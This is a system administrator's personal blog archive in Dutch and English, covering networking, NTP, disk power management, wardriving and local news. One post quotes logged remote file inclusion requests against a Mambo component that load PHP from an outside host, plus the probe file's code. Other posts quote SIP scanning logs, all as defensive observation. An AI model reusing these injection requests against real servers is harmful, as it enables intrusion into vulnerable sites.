News archive - Koos van den Hout

Dankzij een motie die Arda Gerkens (SP) en Martijn van Dam (PvdA) willen gaan indienen gaat demissionair minister Maria van der Hoeven van Economische Zaken onderzoeken of de overheid bij aanbestedingen verplicht moet vragen naar IPv6.
Goed nieuws voor IPv6 acceptatie. Soms moet een overheid de aanmerkelijke macht inzetten om de markt even een sturing te geven in een richting die later nuttig is voor diezelfde markt.
Bron: Kamerleden @ArdaG en @martijnvdam zijn top. Besteden ook aandacht aan niet-sexy maar wel belangrijke zaken - Twitterbericht Erik Huizer.

One of our users at work reported today that he noticed the 'Previous Versions' tab in windows explorer being active and showing what we think of as the snapshots of the NetApp fileserver. I tried it myself on the windows 2008 terminal server and it works as it should. As my boss noted this is a very important step: having snapshots available is one thing, but having them available in the standard interface which (experienced) windows users can use makes quite a difference. Helpdesk page about filesystem snapshots updated.

Looking for that quiet, remote and very, very, very sturdy place to call home? Try the Atlas F missile base, Adirondack Mtns, NY with features like

The original, heavy security doors are built to withstand a 2000 lb blast and are at the underground home entrance.

and

Huge doors open to a large tunnel that accesses the silo that has an additional 20,000 square feet of useable space with unlimited possibilities. The perfect getaway home, it has its own direct runway access, its climate controlled and is capable of withstanding a nuclear hit.

The Silo has a climate constant/approx. 58 degree earth ambient temperature. It is 52' diameter x 178' deep / 9 floor steel superstructure. Entire steel superstructure hangs from gigantic spring suspension system designed to absorb shock of a direct nuclear hit.

It's also easy to reach:

it is part of an exclusive airport subdivision on a (FAA approved) 2050' runway. (It is fully accessable by road too).

Cheap too: only 2.3 million US dollar. Found via It's WAR - lovelylisting

Met alle aankomende wijzigingen op het werk hebben we besloten om de spamfiltering uit te besteden aan de surfnet mailfilter dienst. Die worden er voor betaald om de filtering dagelijks bij te houden en wij hebben er straks minder tijd voor. Totnogtoe was het natuurlijk altijd onze 'eigen' mailsetup en konden we zelf de spamstats bijhouden, en dat verliezen we.
We hebben eerst students.cs.uu.nl omgezet en vanmorgen cs.uu.nl. In de logs van de studentenmailserver viel me opeens op dat de smtpd ratelimiting (anvil) van postfix aansloeg op de surfnet mailfilters dus ik heb de surfnet mailfilter adressen toegevoegd aan de smtpd_client_event_limit_exceptions setting in postfix. Bij cs.uu.nl gebruiken we postfix, al van toen het nog vmailer heette. In sendmail zou ik voor die IP blokken andere ratelimits kunnen zetten maar postfix heeft blijkbaar alleen de opties default en geen ratelimits.

I made a lolcat: How many times do I need to ask to put the seat down!

De adsl aansluiting is tijden stabiel op 7968/1024 ipv 8000/1024. Met alles rond de aankomende xs4all snelheidsverhoging wilde ik weten of dit de maximale snelheid was die uit de lijn wilde komen. Ik heb in de logs terug zitten graven en sinds de omschakeling van fast op interleaved is 7968 de standaard snelheid. Daarvoor was de downloadsnelheid een tijdje instabiel. Verder lijken de specs ok:

                                  Downstream        Upstream 
Margin       [dB]     :             10.5             20.0 
Attenuation  [dB]     :             19.0             11.5 
OutputPower  [dBm]    :             19.0             12.5 

Available Bandwidth                 Cells/s           Kbit/s 
  Downstream          :            18792             7968 
  Upstream            :             2415             1024 

Als ik zo lees over adsl interleaving kan het toch wel kloppen dat de snelheid nu 7968 kilobit/seconde is en ga ik straks naar een hogere snelheid (ergens in de buurt van 16000 kilobit/seconde).
Update : Later bedacht ik me dat ik ooit de adsl config opermode had aangepast naar multimode om stabieler te zijn met adsl1. De grens van adsl1 zit ergens rond 8000 kilobit. Dus geprobeerd:

[adsl]=>config opermode = multi_adsl2plus

En nu zijn de specs:

                                  Downstream        Upstream 
Margin       [dB]     :              6.0             18.0 
Attenuation  [dB]     :             20.0             11.5 
OutputPower  [dBm]    :              2.0             13.0 

Available Bandwidth                 Cells/s           Kbit/s 
  Downstream          :            18879             8005 
  Upstream            :             2426             1029 

Ik ben benieuwd wat het oplevert als er straks 16000/1024 (nee, nogsteeds geen upstream verbetering..) ingesteld wordt. Mocht het tegenvallen dan heb ik de optie om het adsl modem wat nu op zolder staat een stuk dichter bij het aansluitpunt te plaatsen.

Blast from the past today: I tried to subscribe to a surfnet mailinglist and the response had this bit of information:

Summary of resource utilization
-------------------------------
 CPU time:        0.000 sec                Device I/O:       19
 Overhead CPU:    0.016 sec                Paging I/O:      143
 CPU model:         2-CPU 2.5GHz Xeon L5420 6M (2048M)

I remember these lines in status messages when I first got in touch with mailing lists and listservers in 1992. Back then LISTSERV mostly ran on mainframes where this type of information at the end of a job was normal. Messages from LISTSERV used to have as subject back then "Output of job .." suggesting real batch processing.

Interesting weather this morning: snow started between 7 and 8, and it was nearly melted away again before 11. Overview on webcam.idefix.net Uithof archive Monday 8 March 2010.

Wardriving results 2 February - 7 March 2010: 4204 new networks with GPS locations according to WiGLE. Wardriving areas of the city I haven't visited in a while yields large numbers of new networks at the moment. I guess a lot of people have upgraded their wireless access-points.

Werk aan de ligfietsen dit weekend: bij Mirjam was er tijdens de afgelopen zomervakantie een spatbord afgelopen wat ik nog eens moest terugzetten na het repareren van de stukke popnagels (vervangen door m3 boutjes, inspiratie bij bevestiging spatborden vervangen - knurft.net). Bij mij was er iets ernstigers defect: de binnenkabel van de voorrem brak een paar dagen eerder. Ik heb die vervangen door een andere binnenkabel. Zondag zijn we een heel stuk gaan fietsen en toen ging ook de binnenkabel van de achterrem er aan. Op exact dezelfde manier: gebroken bij de schroef van de rem zelf. Ik had de kabels wat kort afgesteld om goed te kunnen remmen, maar daardoor maakte ik geen gebruik meer van de volle bocht van het draaiende deel van de schijfremklauwen. Dus maar even de fiets naar binnen en kijken of ik het kan repareren. Kabel vervangen, en toen ik de remklauw er af had liggen zag ik een stelschroefje op de remklauw 'L-PAD IN ⇒'. Daar eens aan gedraait maar dat zat nogal vast. Aan de andere kant een 'R-PAD in ⇒' en die wilde wel draaien. Daarmee blijk ik de fijnafstelling van de brakepads aan te kunnen passen. Dus ik heb de remklauw er weer opgeschroeft, de kabel beter afgesteld zodat de kans op breken minder is en vervolgens de brakepads aangedraaid. Nu onthouden dat ik ze eerst moet terugdraaien bij vervanging.

Searching for "idefix.net" to see whether it was listed in some overview of websites with certain vulnerable software I found this gem: idefix-net on Facebook Indonesia. I guess I have some sort of second career I never knew about.

It seems the Turkish provider ttnet.tr fell off the Internet for a few hours today. Since we volunteered ntp.cs.uu.nl for tr.pool.ntp.org the drop in traffic was very, very noticeable.

After a bit of searching I managed to get my Dell Latitude D630 laptop to use the audio buttons in fvwm.

Writing about security on your website has this interesting effect in the logs:

200.93.147.154 - - [04/Mar/2010:09:58:35 +0100] "GET /~koos/newstag.cgi/security/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0"
200.93.147.154 - - [04/Mar/2010:09:58:35 +0100] "GET /~koos/newstag.cgi/security%20%20/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0"
200.93.147.154 - - [04/Mar/2010:09:58:41 +0100] "GET /~koos/newstag.cgi/security%20%20/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0"

The content of heheh.txt is predictable:

<?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?>

By pure coincidence there is a file http://zerozon.co.kr/data/eeng/id1.txt with the contents:

<?php /* ZFxID */ echo("Shiro"."Hige"); die("Shiro"."Hige"); /* ZFxID */ ?>

And that all looks very familiar: Fx29Shell php attack. This won't keep me from writing about security or amusing myself by browsing the logfiles. Maybe I'll find a fresh attack. This automated one is getting really boring.

Na de uitslag van de gemeenteraadsverkiezingen 2010 trok iemand de conclusie dat het zo niets meer gaat worden met Almere. Gratis mee te nemen dus bij de rommelmarktspullen.
Lokale screengrab, marktplaats had niet genoeg gevoel voor humor om de advertentie te laten staan.

Yes, took the step. The homepage lives at http://idefix.net/ and the old url redirects. And will have to keep doing that for at least 10 years. Or maybe more, the url for my homepage that was valid until August 2000 still has a working redirect. I'm not moving anything else because that would confuse me too much. So the base href in the html source has to stay.

A ~ in your homepage URL is somewhat very nineties so I started making http://idefix.net/ also point at my homepage and I moved the original content of that page to idefix.net history. I'm now wondering whether I should redirect http://idefix.net/~koos/ to the new location (migrating all links in for example search engines) or let both point at the same page.. or what.
I found some discussions on the tilde in the url. Jukka Korpela has an article Why tilde (~) should not be used in Web addresses (URLs) which explains why this unixism is a bad idea in the modern web and the explanation Get Clues from URLs notes:

Most servers use the ~ symbol to represent the personal directories of individuals.
If the URL contains a tilde then be aware that you are probably (although not definitely) looking at a personal page with personal opinions rather than an official site giving the official line.

Well, as I am the owner of idefix.net there should not be any difference between my opinion and the official opinion of the site.
At work we also got rid of the tildes ages ago so maybe I should just follow the sign of the times. Being good webmasters the old urls still work: http://www.cs.uu.nl/~koos/ will redirect to http://people.cs.uu.nl/koos/.
Enough rambling, this change was to me reason for a bump in the minor version number of the homepage.

In Duitsland is de Vorratsdatenspeicherung (bewaarplicht telecommunicatie gegevens) terdege teruggeroepen door het constitutioneel hof omdat de wetgeving in strijd is met de Duitse grondwet. In Duitsland is er wel een constitutioneel hof wat wetten kan toetsen en wat dat mag aan de hand van klachten van Duitse burgers.

Nu nog zoiets in Nederland... artikel 120 van de Nederlandse grondwet verbiedt een constitutioneel hof. Er ligt een wetsvoorstel van Femke Halsema van Groenlinks om de grondwet te wijzigen om dit deels mogelijk te maken. Maar dat moet nog een keer door de tweede en eerste kamer.

Links:

• BVerfG, 1 BvR 256/08 vom 2.3.2010, Absatz-Nr. (1 - 345) de officiële uitspraak (in juridisch Duits..)
• Pressemitteilung Nr. 11/2010 vom 2. März 2010 Persbericht van het Bundesverfassungsgericht
• Karlsruhe kippt Vorratsdatenspeicherung - Heise.de Heise.de (Duits)
• "Hoogste Duitse rechter: 'bewaarplicht is ongrondwettig'" - Bits of Freedom

Nedap stemcomputers zijn niet dood, ze ruiken alleen maar heel raar. Bij de gemeenteraadsverkiezingen morgen weer een oprisping: Toch elektronisch stemmen bij verkiezingen - nu.nl waarbij dus stemcomputers een 'schaduwverkiezing' draaien, men kan na het echte kiezen met het rode potlood ook nog stemmen via een stemcomputer die werkt met het bonnetjessysteem (stem wordt gelijk uitgedraaid op een bonnetje en in een stembus gedeponeerd). Het aantal 'echte' stemmen met potlood en het aantal stemmen op de stemcomputers hoeven dus niet overeen te komen, maar zou Nedap het aandurven dat een accountant de uitslagen van de computers en die van de computerbonnetjes natelt?

First peak at 5000 packets/second ntp traffic seen on ntp.cs.uu.nl. Still going strong under this load.

antiek aan de rol

Een NS DE3 treinstel passeert heel langzaam de overweg in de Huizingalaan in het spoor vanaf Utrecht Maliebaan naar de kruising bij Blauwkapel. Bij navraag blijkt het de DE3 nummer 114 van het spoorwegmuseum te zijn.

I just noticed something: the archive of webcam.idefix.net in the Uithof in Utrecht now covers a longer period (now 3 years and approximately 3 months) than the archive of webcam.idefix.net at the Beneluxlaan in Utrecht (which stopped just a bit over 2 years). How time flies.

Lots of phishing attempts for webmail accounts flying by, at the moment it seems popular to use webform hosters to ask for account credentials. I seem to miss a part of these. Probably my spamfilters being too good or something. But at work there are some people who know I am interested in new and recurring strains of Internet abuse so I still get interesting stuff forwarded to investigate. The latest catch advertised a dot.tk domain which inlined a webform from a tripod hosted site which was a copy of an emailmeform.com form and used emailmeform.com to process it and redirected to a generic thankyou form by a new zealand printer supplies company. It takes a bit of tracing and trying to solve such a puzzle and notify all parties about their role in the abuse.

By now a lot of people in the world are aware of the case of a US, Pennsylvania school was accused of using webcams in school-issued laptops to spy on students at home without their consent (via Slashdot). A lot of theories and weird stories are going around but I found a good technical explanation: The Spy at Harrington High - Stryde Hax who as a bystander and with his technical background has done a thorough analysis of the techniques used and the stance of the people involved in this matter. Good reading material for those who are actually interested in what was really happening.
The original story seems to be turning into this 'Only in America' story: School spying scandal gets even more bizarre - Slashdot:

The student in question that was disciplined for an "improper act" was apparently accused of either drug use or drug selling. Turns out he was eating Mike & Ike candy, not popping pills.

If you want to detect LANRev Agent on a system, Network Fingerprint for LANRev Agent - Stryde Hax has the answer.

SIP scanning is active again. Sandro Gauci came with a link to And the scanning just keeps on coming I checked the logs on 2 asterisk servers for recent break-in attempts and presto... from different IPs, but the pattern I saw before in trying to find insecure SIP servers:

[Feb 21 10:09:20] NOTICE[6890] chan_sip.c: Registration from '"3776548202"<sip:3776548202@xxx.yyy.zzz.xxx>' failed for '96.57.107.3' - No matching peer found
[Feb 21 10:09:20] NOTICE[6890] chan_sip.c: Registration from '"100"<sip:100@xxx.yyy.zzz.xxx>' failed for '96.57.107.3' - No matching peer found
[Feb 21 10:09:20] NOTICE[6890] chan_sip.c: Registration from '"101"<sip:101@xxx.yyy.zzz.xxx>' failed for '96.57.107.3' - No matching peer found
[Feb 21 10:09:20] NOTICE[6890] chan_sip.c: Registration from '"102"<sip:102@xxx.yyy.zzz.xxx>' failed for '96.57.107.3' - No matching peer found


[Feb 21 10:09:28] NOTICE[6890] chan_sip.c: Registration from '"952"<sip:952@xxx.yyy.zzz.xxx>' failed for '96.57.107.3' - No matching peer found
[Feb 21 10:09:28] NOTICE[6890] chan_sip.c: Registration from '"953"<sip:953@xxx.yyy.zzz.xxx>' failed for '96.57.107.3' - No matching peer found
[Feb 21 10:09:28] NOTICE[6890] chan_sip.c: Registration from '"954"<sip:954@xxx.yyy.zzz.xxx>' failed for '96.57.107.3' - No matching peer found

No damage and no costs. The other server shows attempts to use the sip guest environment again:

[Feb 13 05:27:08] NOTICE[5710] chan_sip.c: Call from '' to extension '90442075821233' rejected because extension not found.
[Feb 13 05:27:27] NOTICE[5710] chan_sip.c: Call from '' to extension '9442078493108' rejected because extension not found.
[Feb 13 05:27:38] NOTICE[5710] chan_sip.c: Call from '' to extension '0442076311117' rejected because extension not found.
[Feb 13 05:27:40] NOTICE[5710] chan_sip.c: Call from '' to extension '0011447850019298' rejected because extension not found.
[Feb 13 05:27:42] NOTICE[5710] chan_sip.c: Call from '' to extension '00011441628481177' rejected because extension not found.
[Feb 13 05:27:44] NOTICE[5710] chan_sip.c: Call from '' to extension '0001441383417547' rejected because extension not found.
[Feb 13 05:27:56] NOTICE[5710] chan_sip.c: Call from '' to extension '0000447956581268' rejected because extension not found.
[Feb 13 05:27:57] NOTICE[5710] chan_sip.c: Call from '' to extension '00011441628481177' rejected because extension not found.
[Feb 13 05:28:08] NOTICE[5710] chan_sip.c: Call from '' to extension '900442075964032' rejected because extension not found.
[Feb 13 05:28:08] NOTICE[5710] chan_sip.c: Call from '' to extension '9011441252625280' rejected because extension not found.
[Feb 13 05:28:09] NOTICE[5710] chan_sip.c: Call from '' to extension '1442074370973' rejected because extension not found.
[Feb 13 05:28:10] NOTICE[5710] chan_sip.c: Call from '' to extension '9442078493108' rejected because extension not found.
[Feb 13 05:28:10] NOTICE[5710] chan_sip.c: Call from '' to extension '00000447889904142' rejected because extension not found.
[Feb 13 05:28:10] NOTICE[5710] chan_sip.c: Call from '' to extension '0001441383417547' rejected because extension not found.

This time with somewhat random looking phone numbers in the UK which aren't well-known to google.

De backup tapes van BBS Koos z'n Doos waren nog leesbaar, dus ik ben nu wat aan het spelen met wat van die tapes af kwam, en dat komt on-line op http://bbs.idefix.net/.

Todays xkcd is very amusing! As a system administrator I can imagine the need for making sure important infrastructure like the blog of a cat.

Friday, time for the Friday Afternoon URL page which you can also follow on twitter as @fridayaftURL to get fresh Friday Afternoon URLs in your twitter feed!

No license to rdesktop for me: I recently got a really weird error from rdesktop:

koos@leek:~$ rdesktop -M -g 1200x900 -d something terminalserver
Autoselected keyboard map en-us
disconnect: No valid license available.

Some searching found me: License to rdesktop. Indeed, setting a different hostname from my own hostname helps:

koos@leek:~$ rdesktop -M -g 1200x900 -d something -n leeks terminalserver
Autoselected keyboard map en-us
/users/koos/.rdesktop/licence.leeks.new: Permission denied
WARNING: Remote desktop does not support colour depth 24; falling back to 16

The license file error has to do with another workaround. But maybe the running out of licenses for 'leek' is because I never give licenses back. Why is all this software very busy with making sure money is made for its maker and not busy with helping the user.

The EFF has written an article Music Journalism is the New Piracy. The music industry seems to have the intention of thoroughly destroying itself, and that destruction will be celebrated by music fans worldwide. Found via Is There Any Way To Be A Music Blogger Without Risking Takedown? at Techdirt.
Or as Boingboing put it: Music industry to musicbloggers: there's no point in obeying the law.

Some actors are annoyed by being typecast in the same roles constantly, but some cities can be typecasted too: I watched WarGames (1983) yesterday and noted in a number of shots of Seattle it was raining. Now I'm watching Firewall (2006) and I think I haven't seen an outdoor scene yet without rain.
I visited Seattle myself and it's not that bad.

Na een lezing van Arnoud Engelfriet op de recente surfnet cert (computer emergency response teams) / ibo (informatie beveiligers in het onderwijs) conferentie ben ik eens door Internetrecht aan het bladeren en hij merkt iets op waar ik me ook vreselijk aan erger: Houd eens op met dat “Bron: Youtube” of “Bron: Flickr.com”!. Het heeft dus ten eerste het aspect dat beide sites het platform zijn en dat de originele auteur prima te vinden is (mijn ergernis) maar ook dat de licentie het niet altijd zomaar toestaat (afhankelijk van de eventuele nieuwswaarde van filmpje / foto).
En prompt zie ik een voorbeeld hoe het wel moet: hln.be geeft bij de eerste foto's van het treinongeluk in België keurig aan: twitpic.com user xxxx. Alleen heb ik het toen niet bewaard en zijn de foto's nu blijkbaar wel vervangen door persfoto's.

Even with my head clouded by a serious cold I had to create my lolcaption when I saw this picture and caption at ROFLRazzi Goes Romantic…ish. My take on it: Dingdong! .. Nobody home!

Sometimes even I use that other 'operating system' which in this particular case had no acrobat pdf reader. So I went to find it.. and it is a 45 meg (!!!) download which installs its own download-manager in Firefox. This download manager advertises for more downloads from Adobe and related companies. All this while Firefox has a perfect download manager of its own and it is all the equivalent of wget $url. To put it mildly: whisky tango foxtrot.

The first friday with the friday afternoon url page using Twitter @fridayaftURL to deal out the weekly dose of Friday afternoon fun.
Technically it all worked. But with myself and only a german url shortening service following it there isn't much of an audience yet! Time to do something about that.

I did some serious web services programming (in perl) and updated the scripts powering the Friday Afternoon URL page to post new urls via Twitter on Friday. You can follow @fridayaftURL to get a weekly dose of Friday afternoon stuff from all over the web. The urls are now stored in a (postgresql) database and on Friday a script runs which searches for new urls and posts them to Twitter using the Twitter api. When urls need to be shortened it uses the ln -s_ web service to shorten them.

I found the probable cause of the not so great power saving: when I installed the first new disk I also updated the bios. And the message I get when trying to load the powernow-k8 cpu driver is:

powernow-k8: Found 1 AMD Athlon(tm) Dual Core Processor 4850e processors (2 cpu cores) (version 2.20.00)
powernow-k8: MP systems not supported by PSB BIOS structure
powernow-k8: MP systems not supported by PSB BIOS structure

So the cpu keeps running at maximum speed without throttling. Searching for the error message finds Ubuntu Bug #33116: powernow-k8 refuses to load and Ubuntu Bug #398109: powernow-k8: Your BIOS does not provide ACPI _PSS objects in a way that Linux understands suggests that I need to check the bios settings to enable "Cool'n'Quiet", enable ACPI APIC and disable MCP61 ACPI HPET Table. That's planned for the next hardware changes.

Ok, I'm usually not the flash and embedding type, but after a bit of trying this one is nice:

My first association when I heard that jingle...

I noticed that the new Western Digital WD15EADS disk spun down way too fast. After some serious testing I found: when I set the "Advanced Power Management" level (using hdparm -B) to 127 or less the "standby (spindown) timeout" (set using hdparm -S) is ignored and the drive spins down after about 5 8 seconds of inactivity. Way too soon when playing a movie, with mplayer the movie stalls about every 10 seconds because a new bit of movie has to be read from disk which causes another start/stop. The smartctl start/stop counter goes up at the same rate. Feels like a firmware bug to me or a difference of opinion between hdparm and the disk. But the hdparm report suggests that these settings should work on the disk:

ATA device, with non-removable media
        Model Number:       WDC WD15EADS-00S2B0                     
        Firmware Revision:  04.05G04

        Standby timer values: spec'd by Standard, with device specific minimum
        Advanced power management level: 126

           *    Power Management feature set

I asked Western Digital customer help about this but the first (standard?) answer is from Support for WD products in LINUX or UNIX which comes down to "we don't support anything else than jumper settings for these operating systems".

A lot of further searching with google suggests to me that the 'IntelliPark' feature is causing the drive to park its heads after 8 seconds of inactivity which is not a useful default when streaming video from it with a reasonable cache. And the 'Load Cycle Count' will go up fast, which may result in the drive reaching the 'suggested maximum' within a year. I don't need to test the warranty that fast.

As a workaround I set the Advanced Power Management level back to 128 and installed spindown which is a utility which watches the disk activity from userspace and issues a spindown command when no activity (from /proc/diskstats, so for linux at the device level) was measured over the configured period of time. Now it spins down when the filesystems have been idle for 10 minutes which is a lot more usable.
Update: Official answer from Western Digital customer help is that it's not possible to change this 8 second timeout. So I'll stick to the spindown solution.

The resulting power save from adding a new sata disk, moving the data and removing the old pata disks is not spectacular (yet): the 5 pata disks (all with activated automatic spindown) had the UPS at a 40% load, the current 2 sata and 2 pata disks (also with automatic spindown) have the UPS at a 42% load. It'll be interesting to see what happens when the 2 pata disks can be removed. The main original idea was to save a bit of power and make the system less complicated, let's see if that first part works out in the end.
Update: Found the cause of the not so great power saving: probably the recent bios update.

Filesystems have been moved to the new huge sata disk in home server greenblatt and I found time this evening to remove three old ones. There may be a race condition in the startup scripts where lvm2 is not completely up and running when the filesystems are mounted from the fstab but I saw that happen only once.

My very own security incident involving China (in a way):

[Jan 28 09:55:45] NOTICE[7593] chan_sip.c: Call from '' to extension '00442078420960' rejected because extension not found.

An attempt (within the public sip context) to call a number in England. The Chinese embassy in London. All attempts failed since the asterisk which logged that has no idea how to call the big phone network. Information from a lecture on SIP security suggests that this kind of attempts is a sort of ddos attack on a phone number.

I looked at the project sundial power calculations again and did some more calculations: even when I take the parts with the lowest energy usage and get the average usage down to 5.4 Watt, the investment in solar panels to get even through December and January in the Netherlands would mean it would take somewhat over a 100 years to 'earn back' the investment in the solar panels. So maybe it is a better idea to power the weatherstation from the grid and make sure the earth connection is really good to avoid damage to the power grid at home should lightning strike it. Still using wifi for data transfer would be a wise idea.
Update: About the same goes for wind power: because we live in the city and can't put up a 10 meter high pole for a wind generator the generator would become quite expensive.

Maybe IPv6 traffic will get another boost now: for participants in the Google over IPv6 program the records for youtube now have been added:

$ host www.youtube.com
www.youtube.com is an alias for youtube-ui.l.google.com.
youtube-ui.l.google.com has address 74.125.77.100
youtube-ui.l.google.com has address 74.125.77.101
youtube-ui.l.google.com has address 74.125.77.102
youtube-ui.l.google.com has IPv6 address 2a00:1450:8001::8b
youtube-ui.l.google.com has IPv6 address 2a00:1450:8001::8a
youtube-ui.l.google.com has IPv6 address 2a00:1450:8001::65
youtube-ui.l.google.com has IPv6 address 2a00:1450:8001::71
youtube-ui.l.google.com has IPv6 address 2a00:1450:8001::64
youtube-ui.l.google.com has IPv6 address 2a00:1450:8001::66

Video is streamed from cache servers like:

$ host v1.lscache1.c.youtube.com
v1.lscache1.c.youtube.com is an alias for v1.lscache1.l.google.com.
v1.lscache1.l.google.com has address 82.94.228.144
v1.lscache1.l.google.com has IPv6 address 2a00:1450:4001::10

All reachable via IPv6. I'm almost tempted to try to try to play a youtube video via a v6-only connection and see what breaks.

In following some links about 1-wire projects I found a German Supplier of 1-wire components which can be interesting: Fuchs Elektronik sells 1-wire components at a reasonable price such as the DS18B20 1-wire high resolution thermometer. Too bad they don't sell other interesting sensors like the barometer which could help in combining an order.

Wardriving results 14 December 2009 - 1 February 2010: 4450 new networks with GPS locations according to WiGLE. In the WiGLE stats I went to 13th place and passed the 180000 networks mark.

WiGLE also did a very nice upgrade: the new WiGLE wardriving maps are based on google maps.

We volunteered ntp.cs.uu.nl for extra capacity for the Turkish ntp pool, and the results are quite visible in the ntp.cs.uu.nl statistics. Suddenly peaks are near 5000 packets per second. But ntpd (and the freebsd kernel) deal with it without problems.

And I'm back from a snowboarding holiday in Fiss in Austria. A great wintersport area, connecting Fiss, Ladis and Serfaus. We had great weather, first sun and later snow, resulting in fresh powder for the last few days. Snowboarding in fresh powder is really great. I got some much needed rest too.

Tien jaar geleden haalde ik mijn rijbewijs (en gebruikte ik dus ook al newsitems op mijn homepage). Dus het was tijd voor vernieuwen. Ik kreeg daar keurig een brief over van de RDW maar die was met alle verbouwingsdrukte blijven liggen. Vorige week ontdekte ik dat 2010-01-10 geweest was en ik dus geen geldig 'roze papiertje' meer had. Snel voor pasfoto's naar foto boekhorst die prima pasfoto's volgens de huidige regels en toen naar de gemeente Utrecht voor de aanvraag. Ondertussen rond, dus nu is het 'roze papiertje' vervangen door een 'roze creditcard'.

I upgraded ntpd on ntp.cs.uu.nl from 4.2.4 to 4.2.6 and suddenly I notice in the output that this has changed the stratum from 2 to 1.

$ ntpq -c rv ntp.cs.uu.nl
status=011d leap_none, sync_atomic, 1 event, event_13,
version="ntpd 4.2.6@1.2089-o Fri Jan 15 14:31:14 UTC 2010 (1)",
processor="i386", system="FreeBSD/5.4-RELEASE-p13", leap=00, stratum=1,
precision=-19, rootdelay=0.000, rootdisp=1.456, refid=PPS,
reftime=cefb066f.cbe638ff  Fri, Jan 15 2010 16:21:19.796,
clock=cefb0693.889dd5ee  Fri, Jan 15 2010 16:21:55.533, peer=7047, tc=6,
mintc=3, offset=-0.001, frequency=15.448, sys_jitter=0.002,
clk_jitter=0.001, clk_wander=0.002

Which matches the peer list where the PPS stratum is now 0:

$ ntpq -c peer ntp.cs.uu.nl
     remote           refid      st t when poll reach   delay   offset  jitter
==============================================================================
*huygens.cs.uu.n .PPS.            1 u   23   64  377    0.197    0.009   0.258
+stardate.cs.uu. .PPS.            1 u   13   64  377    0.998   -0.058   0.033
+tijger.phys.uu. metronoom.dmz.c  2 u   15   64  376    0.599    0.004   0.185
 LOCAL(0)        .LOCL.          10 l  627   64    0    0.000    0.000   0.002
oPPS(0)          .PPS.            0 l   49   64  377    0.000   -0.002   0.002
 NTP.MCAST.NET   .MCST.          16 u    -   64    0    0.000    0.000   0.002

I guess some definition of PPS input has changed. Now I wonder how much more ntp traffic this will cause.

Het winterweer houdt nog steeds strak vol, en dus kijk ik naar mijn vervoersmogelijkheden. Met de gladheid gebruik ik zowiezo maar de rechtopfiets en niet de ligfiets, rechtop voel ik me dan toch iets veiliger. Ik vroeg me eerst af waar alle meldingen over gladheid op fietspaden in Utrecht vandaan kwamen totdat ik van de week naar iets anders wilde fietsen dan naar mijn werk in de Uithof. In de gemeente Utrecht worden alleen de fietspaden goed schoongehouden. Op zich een prima actie. Maar, er zijn daarnaast nog veel meer fietsroutes waarlangs zich dagelijks grote aantallen fietsers voortbewegen. Als die fietsroute toevallig een achteraf straat is waar geen doorgaand autoverkeer hoort te zijn dan zit deze ook buiten de routes waar schoongemaakt zal worden. Een erg duidelijk voorbeeld is te zien rond het Salvador Allendeplein in Utrecht: de fietspaden daar, onder andere langs de Kardinaal de Jongweg zijn prima geveegd. Maar de Troelstralaan, wat voor veel fietsers de route is naar de binnenstad is een ijsbaan.
Ik had graag een kaartje uit openstreetmap toegevoegd maar daar ontbreken nogal wat fietspaden in dit gebied. Projectje voor wanneer het beter weer is.

The new disk in the homeserver greenblatt was another case of a disk not wanting to go to sleep after the set period. Some searching found two answers: spindown, a daemon to monitor disks for inactivity and spin them down with sg_start --stop or hdparm -y. But the other answer was a better answer: hdparm standby timeout not working for WD raptors? has as answer:

* I also know of quite a number of drives where hdparm -B settings override the -S settings, even if you set the -S settings after the hdparm -B settings. You could try combinations with various values of hdparm -B, especially 1 and 255.

And the manpage of hdparm has this bit:

-B Set Advanced Power Management feature, if the drive supports it. A low value means aggressive power management and a high value means better performance. Possible settings range from values 1 through 127 (which permit spin-down), and values 128 through 254 (which do not permit spin-down). The highest degree of power management is attained with a setting of 1, and the highest I/O performance with a setting of 254. A value of 255 tells hdparm to disable Advanced Power Management altogether on the drive (not all drives support disabling it, but most do).

Default on the WD drives is indeed 128, which does not permit spindown on idle. I changed it to 127, see if that helps. I prefer it if the drives decide for themselves when to spin down.
Update : Yes, the changed advanced power management setting helps, now the drive spins down when not in use.

Vanmorgen via het centrum met de bus, met de ov-chipkaart. Behalve het privacy aspect is het namenlijk verder een handig systeem, al zouden sommige dingen handiger kunnen voor de reiziger als een en ander vanuit het perspectief van de reiziger was ontworpen.
Maar op een bepaald moment vielen de ovchip kaartlezers in de bus uit. De chauffeur was naast het rijden bezig met een touchscreen waar een status op rood stond. Blijkbaar is er toch communicatie met de buitenwereld nodig voor werkende ovchip kaartlezers. Uit de originele verhalen begreep ik dat bussen genoeg hadden aan een gps ontvanger. Opvallend is ook dat de automatische halte-aankondigingen van de bus het toen niet meer deed. Toen kon ik dus ook niet meer uitchecken bij het uitstappen, of de kaartlezer van een andere gvu bus gebruiken om uit te checken, want ik zag overal rode ledjes. Bij een volgende busrit in een bus waar de ovchip automaat niet werkte zwaaide ik dus maar even met de ovchip kaart naar de chauffeur die me zo doorzwaaide.
Maar nu heb ik dus een uitcheck actie gemist. Kijken of de restitutie actie daar ook voor werkt.
Update 2010-01-13: Restitutie geprobeerd: volgens de ov chipkaart restitutieformulieren (afgrijselijke deeplink binnen een framesite) moet ik een bonnetje uitprinten met de laatste 10 transacties:

Let op: stuur uitdraai mee van laatste tien transacties. U kunt een overzicht van uw laatste tien transacties uitdraaien bij de oplaad- en verkoopautomaten op metrostations en bij Verkoop- en Informatiepunten.

Alleen: waar doe je dat. Op de ov-chipkaart adresvinder kan ik geen vinkje aanzetten 'transactie overzicht uitdraaien'. Die in de Uithof bij de bibliotheek kan het niet, de automaat bij de GVU klantenservice in het centrum kan het ook niet, dan maar in de rij voor het loket van de GVU klantenservice. Waar ze een stapje verder gingen: ze konden gelijk de mislukte transactie repareren, waardoor ik het hele formulier niet meer nodig had.

The sensors at home are updated with data from the new disk. The cause of the relatively high temperatures is that 3 disks (2 pata and 1 new sata) are in one cage together. I hope to rearrange disks so the airflow improves and they cool better. I might need a bit longer sata cable to make that happen.

